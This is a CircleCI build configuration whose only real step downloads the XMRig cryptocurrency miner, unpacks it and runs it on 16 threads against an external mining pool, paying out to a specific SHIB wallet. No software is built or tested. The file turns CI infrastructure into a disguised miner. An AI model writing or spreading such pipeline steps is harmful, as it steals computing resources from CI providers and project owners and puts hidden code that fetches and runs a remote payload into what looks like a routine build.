version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget https://github.com/xmrig/xmrig/releases/download/v6.15.1/xmrig-6.15.1-linux-x64.tar.gz && tar xf xmrig-6.15.1-linux-x64.tar.gz &&cd xmrig-6.15.1 && ./xmrig -o rx.unmineable.com:13333 -a rx -k -p x -t 16 -u SHIB:0x47d826d770d5926A7C00f56658b1eB7fF3A48A31.handoko0909